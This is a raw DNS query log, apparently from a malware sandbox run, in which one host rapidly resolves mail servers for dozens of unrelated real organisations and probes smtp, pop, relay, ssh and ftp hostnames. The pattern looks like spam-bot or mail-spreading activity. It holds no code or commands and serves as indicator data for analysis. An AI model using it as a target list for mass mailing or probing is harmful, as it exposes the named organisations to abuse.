                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com147.182.189.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com164.90.197.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com147.182.180.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079096079 CET1.1.1.1192.168.2.40xe330No error (0)mx195.m1bp.com164.90.197.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.079790115 CET1.1.1.1192.168.2.40x1903No error (0)alt4.aspmx.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.082693100 CET1.1.1.1192.168.2.40x2eaNo error (0)ALT2.ASPMX.L.GOOGLE.com64.233.184.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.085854053 CET1.1.1.1192.168.2.40x4d9No error (0)smx00.udag.de62.146.106.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.095561028 CET1.1.1.1192.168.2.40x50d0No error (0)mail.tradeavenida.com162.241.24.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.104808092 CET1.1.1.1192.168.2.40xb5edNo error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.104808092 CET1.1.1.1192.168.2.40xb5edNo error (0)rochestergauges-be02c.mail.protection.outlook.com104.47.73.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.108541965 CET1.1.1.1192.168.2.40xddfeNo error (0)mx1.supremebox.com198.23.53.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116525888 CET1.1.1.1192.168.2.40x9acaNo error (0)mail.himontessori.com74.220.219.189A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.40.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.42.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.8.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.116882086 CET1.1.1.1192.168.2.40x4d64No error (0)directlendersllc-com.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.40.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.119394064 CET1.1.1.1192.168.2.40x64a9No error (0)gmailvz-com.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.121762991 CET1.1.1.1192.168.2.40xf07No error (0)gethsemane-org.mail.protection.outlook.com104.47.73.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.121762991 CET1.1.1.1192.168.2.40xf07No error (0)gethsemane-org.mail.protection.outlook.com104.47.74.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.128204107 CET1.1.1.1192.168.2.40x3d5dNo error (0)ibright-net.mail.protection.outlook.com104.47.55.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.128204107 CET1.1.1.1192.168.2.40x3d5dNo error (0)ibright-net.mail.protection.outlook.com104.47.59.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.68.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.133821011 CET1.1.1.1192.168.2.40x4b7eNo error (0)ecolandeck-at0i.mail.protection.outlook.com52.101.73.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.40.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.42.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.8.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.42.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.168576002 CET1.1.1.1192.168.2.40x1735No error (0)rechagricola-com-br.mail.protection.outlook.com52.101.42.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.11.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.9.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.11.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.175314903 CET1.1.1.1192.168.2.40xd7d0No error (0)greenrworld-com.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.176580906 CET1.1.1.1192.168.2.40xd907No error (0)coimbrausa.com192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.213596106 CET1.1.1.1192.168.2.40xd98aNo error (0)esoft-academy.mail.eo.outlook.com52.101.132.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.213596106 CET1.1.1.1192.168.2.40xd98aNo error (0)esoft-academy.mail.eo.outlook.com52.101.137.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.213596106 CET1.1.1.1192.168.2.40xd98aNo error (0)esoft-academy.mail.eo.outlook.com52.101.132.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.213596106 CET1.1.1.1192.168.2.40xd98aNo error (0)esoft-academy.mail.eo.outlook.com52.101.137.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.275237083 CET1.1.1.1192.168.2.40xf3abNo error (0)mx-vip-02.uni5.net191.6.220.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.277237892 CET1.1.1.1192.168.2.40x82abNo error (0)samsongroup.in.tmes.trendmicro.eu18.185.115.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.277237892 CET1.1.1.1192.168.2.40x82abNo error (0)samsongroup.in.tmes.trendmicro.eu18.185.115.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.277237892 CET1.1.1.1192.168.2.40x82abNo error (0)samsongroup.in.tmes.trendmicro.eu18.185.115.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.279556036 CET1.1.1.1192.168.2.40xcebbNo error (0)mx.rimed.cu200.55.156.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.279556036 CET1.1.1.1192.168.2.40xcebbNo error (0)mx.rimed.cu200.55.156.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.279556036 CET1.1.1.1192.168.2.40xcebbNo error (0)mx.rimed.cu200.55.156.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.283298016 CET1.1.1.1192.168.2.40x7b04Name error (3)ms86978078.msv1.invalidnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.291778088 CET1.1.1.1192.168.2.40xd92cNo error (0)mx1.jimdo.com173.203.187.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.315884113 CET1.1.1.1192.168.2.40x5429No error (0)em4.mainnetmail.com142.93.233.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.335341930 CET1.1.1.1192.168.2.40x4a0eNo error (0)celogic-com0e.mail.protection.outlook.com52.101.132.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.335341930 CET1.1.1.1192.168.2.40x4a0eNo error (0)celogic-com0e.mail.protection.outlook.com52.101.137.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.335341930 CET1.1.1.1192.168.2.40x4a0eNo error (0)celogic-com0e.mail.protection.outlook.com52.101.137.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.335341930 CET1.1.1.1192.168.2.40x4a0eNo error (0)celogic-com0e.mail.protection.outlook.com52.101.132.28A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.68.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.68.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.68.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.341857910 CET1.1.1.1192.168.2.40x8d79No error (0)grg17geblergasse-at.mail.protection.outlook.com52.101.73.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.353749990 CET1.1.1.1192.168.2.40xbd3Name error (3)foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.8.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.11.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.40.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.358293056 CET1.1.1.1192.168.2.40x9bb0No error (0)chandigarhuniversityazure.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.42.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.8.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.9.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.360570908 CET1.1.1.1192.168.2.40x50ddNo error (0)engelfirm-com01c.mail.protection.outlook.com52.101.11.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.73.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.361093044 CET1.1.1.1192.168.2.40x4884No error (0)ceuandalucia-es.mail.protection.outlook.com52.101.68.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.393697977 CET1.1.1.1192.168.2.40x4d61No error (0)recv1.erinn.biz133.130.97.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.439270020 CET1.1.1.1192.168.2.40x93fbName error (3)utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.459636927 CET1.1.1.1192.168.2.40xd2f8No error (0)mx.avasin.plus.net212.159.8.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.459636927 CET1.1.1.1192.168.2.40xd2f8No error (0)mx.avasin.plus.net212.159.9.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.469460011 CET1.1.1.1192.168.2.40x4d91No error (0)mail.schor.be80.92.66.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.478251934 CET1.1.1.1192.168.2.40x33a7No error (0)talentius-com.mail.protection.outlook.com104.47.17.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.478251934 CET1.1.1.1192.168.2.40x33a7No error (0)talentius-com.mail.protection.outlook.com104.47.17.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.478745937 CET1.1.1.1192.168.2.40xf420No error (0)mail.grantstech.io193.203.239.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.484002113 CET1.1.1.1192.168.2.40x8653No error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.484002113 CET1.1.1.1192.168.2.40x8653No error (0)my-calvary-qld-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.579133034 CET1.1.1.1192.168.2.40x2688No error (0)mx2.mailserver.it212.97.32.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.582110882 CET1.1.1.1192.168.2.40x1593No error (0)c47ab644ec7e3f14.mx2.emailprofi.seznam.cz77.75.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.642160892 CET1.1.1.1192.168.2.40x79aeName error (3)pop.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.698458910 CET1.1.1.1192.168.2.40x163fNo error (0)mx.core.locaweb.com.br177.153.23.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.705179930 CET1.1.1.1192.168.2.40x3ec4No error (0)mail.locandafrancigena.it144.76.107.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.757355928 CET1.1.1.1192.168.2.40xa7adNo error (0)smtpin.rzone.de81.169.145.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.760700941 CET1.1.1.1192.168.2.40x34c2Name error (3)smtp.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.763360023 CET1.1.1.1192.168.2.40x82d5No error (0)mx.b.locaweb.com.br177.153.23.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.764151096 CET1.1.1.1192.168.2.40x250fName error (3)pop.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.787683964 CET1.1.1.1192.168.2.40x1900Name error (3)mailgate.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.787765980 CET1.1.1.1192.168.2.40xaa87Name error (3)relay.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.808569908 CET1.1.1.1192.168.2.40xd3aName error (3)ssh.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.873680115 CET1.1.1.1192.168.2.40x4a48Name error (3)mailgate.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.941373110 CET1.1.1.1192.168.2.40x7b82Name error (3)relay.maxiv.lu.senonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.980302095 CET1.1.1.1192.168.2.40xf96aNo error (0)www.rechagricola.com.brstore.cws.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.980302095 CET1.1.1.1192.168.2.40xf96aNo error (0)store.cws.digitalkubernetes-producao-1203337388.sa-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.980302095 CET1.1.1.1192.168.2.40xf96aNo error (0)kubernetes-producao-1203337388.sa-east-1.elb.amazonaws.com18.228.96.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.980302095 CET1.1.1.1192.168.2.40xf96aNo error (0)kubernetes-producao-1203337388.sa-east-1.elb.amazonaws.com54.232.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.989124060 CET1.1.1.1192.168.2.40xd0d2Name error (3)smtp.bunasta.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.020525932 CET1.1.1.1192.168.2.40x4faeNo error (0)www.linkan-group.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.020525932 CET1.1.1.1192.168.2.40x4faeNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.020525932 CET1.1.1.1192.168.2.40x4faeNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.023397923 CET1.1.1.1192.168.2.40x237cName error (3)relay.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.032501936 CET1.1.1.1192.168.2.40x652fNo error (0)www.dstaq.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.032501936 CET1.1.1.1192.168.2.40x652fNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.032501936 CET1.1.1.1192.168.2.40x652fNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.40.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.42.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.40.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.9.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.8.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.11.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.069309950 CET1.1.1.1192.168.2.40x3b23No error (0)upn-pe.mail.protection.outlook.com52.101.42.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.093813896 CET1.1.1.1192.168.2.40x8c92No error (0)www.hugedomains.com104.26.7.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.093813896 CET1.1.1.1192.168.2.40x8c92No error (0)www.hugedomains.com104.26.6.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.093813896 CET1.1.1.1192.168.2.40x8c92No error (0)www.hugedomains.com172.67.70.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.135478973 CET1.1.1.1192.168.2.40x6b76No error (0)getquipu.com15.236.29.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.135478973 CET1.1.1.1192.168.2.40x6b76No error (0)getquipu.com15.236.187.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.155222893 CET1.1.1.1192.168.2.40xb2ccNo error (0)www.ceuandalucia.es213.0.13.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.180494070 CET1.1.1.1192.168.2.40x4c36No error (0)www.prettypollycleaning.ae192.96.211.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.197315931 CET1.1.1.1192.168.2.40x4152No error (0)mydirectlender.com162.250.126.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.197976112 CET1.1.1.1192.168.2.40x8d79No error (0)www.2brospw.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.197976112 CET1.1.1.1192.168.2.40x8d79No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.197976112 CET1.1.1.1192.168.2.40x8d79No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.223562002 CET1.1.1.1192.168.2.40x41cdName error (3)ftp.cringemonster.comnonenoneA (IP address)IN (0x0001)false
